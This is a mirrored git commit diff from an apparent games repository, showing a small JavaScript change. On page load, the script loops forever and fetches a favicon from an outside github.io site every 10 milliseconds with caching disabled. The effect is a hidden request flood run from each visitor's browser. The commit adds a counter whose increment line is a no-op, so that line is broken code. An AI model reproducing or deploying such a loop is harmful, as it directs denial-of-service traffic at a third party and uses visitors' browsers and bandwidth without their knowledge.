mirror of
https://github.com/hexahigh/games.git
synced 2025-12-11 20:15:38 +01:00
check
This commit is contained in:
parent
4f9fbeab02
commit
4897f0188c
@ -16,10 +16,12 @@
|
|||||||
setTimeout(resolve, milliseconds);
|
setTimeout(resolve, milliseconds);
|
||||||
});
|
});
|
||||||
}
|
}
|
||||||
|
var timesdown = 0
|
||||||
window.onload = async function startdown(){
|
window.onload = async function startdown(){
|
||||||
while(true) {
|
while(true) {
|
||||||
await delay(10);
|
await delay(10);
|
||||||
fetch('https://t0m0t0w.github.io/favicon.png', {cache: "no-store"})
|
fetch('https://t0m0t0w.github.io/favicon.png', {cache: "no-store"})
|
||||||
|
timesdown + 1
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
let speed = 1000
|
let speed = 1000
|
||||||
|
|||||||
Loading…
x
Reference in New Issue
Block a user